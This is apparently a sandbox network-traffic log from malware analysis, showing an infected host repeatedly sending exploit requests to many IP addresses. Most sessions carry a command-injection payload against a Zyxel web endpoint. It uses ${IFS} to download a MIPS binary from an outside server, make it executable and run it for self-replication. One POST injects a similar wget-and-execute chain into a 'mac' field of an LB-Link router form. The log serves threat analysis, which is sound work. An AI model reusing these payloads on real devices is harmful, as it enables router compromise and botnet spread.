                                                Jan 29, 2024 07:07:54.476809025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6022192.168.2.234259273.86.199.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.476855040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6023192.168.2.234189297.213.88.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.476903915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6024192.168.2.2352102208.160.231.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.476954937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6025192.168.2.233578419.198.140.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.476978064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6026192.168.2.2333248210.178.209.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.477019072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6027192.168.2.2341062115.55.202.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.477050066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6028192.168.2.2333722180.68.166.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.477085114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6029192.168.2.2355800172.88.83.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.477113962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6030192.168.2.234530019.214.63.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.477164984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6031192.168.2.2334942159.164.187.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.477164984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6032192.168.2.234991076.139.235.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.477220058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6033192.168.2.2355400116.23.134.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.477255106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6034192.168.2.2352174197.190.140.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.477325916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6035192.168.2.2348050126.181.44.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.480618000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6036192.168.2.235603084.35.63.1748080
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.305202007 CET224OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                                Jan 29, 2024 07:07:55.516366005 CET492INHTTP/1.1 400 Bad Request
                                                Content-Type: text/html
                                                Content-Length: 349
                                                Connection: close
                                                Date: Mon, 29 Jan 2024 06:07:55 GMT
                                                Server: DWS
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>
                                                Jan 29, 2024 07:07:58.514394999 CET492INHTTP/1.1 400 Bad Request
                                                Content-Type: text/html
                                                Content-Length: 349
                                                Connection: close
                                                Date: Mon, 29 Jan 2024 06:07:55 GMT
                                                Server: DWS
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6037192.168.2.234511642.118.248.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.487441063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6038192.168.2.2340444115.90.23.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.487482071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6039192.168.2.2344960117.64.58.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.487488985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6040192.168.2.2340688105.171.136.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.487544060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6041192.168.2.235012483.17.82.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.487613916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6042192.168.2.2336024202.176.136.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.487627983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6043192.168.2.2335374169.41.113.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.487663031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6044192.168.2.2350460182.12.57.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.487696886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6045192.168.2.2353342143.99.25.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.487751961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6046192.168.2.235789668.83.158.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.487796068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6047192.168.2.23347685.109.141.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.487814903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6048192.168.2.2358940131.9.206.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.487863064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6049192.168.2.2336340200.100.164.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.487912893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6050192.168.2.2353030178.185.110.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.487962961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6051192.168.2.2337822180.60.112.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.487998009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6052192.168.2.235190427.88.121.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.488035917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6053192.168.2.235924437.83.83.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.488070011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6054192.168.2.2356152107.175.164.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.488106012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6055192.168.2.2347404187.210.23.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.488142967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6056192.168.2.233743836.88.213.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.488189936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6057192.168.2.235542846.12.110.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.488220930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6058192.168.2.2354720168.160.58.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.488254070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6059192.168.2.236024251.213.55.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.488277912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6060192.168.2.2356346185.145.50.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.488321066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6061192.168.2.234712813.84.118.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.488354921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6062192.168.2.234110040.71.248.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.488388062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6063192.168.2.2355530117.2.144.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.488470078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6064192.168.2.2352544124.181.98.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.488472939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6065192.168.2.234630024.13.128.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.488516092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6066192.168.2.234796432.80.11.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.488552094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6067192.168.2.235244869.106.169.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.488586903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6068192.168.2.2340550140.82.127.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.488627911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6069192.168.2.235061846.27.101.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.488698006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6070192.168.2.234273246.61.216.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.488732100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6071192.168.2.2340276109.221.14.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.488734007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6072192.168.2.2337980141.186.42.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.488862991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6073192.168.2.235561470.196.1.123443
                                                TimestampBytes transferredDirectionData
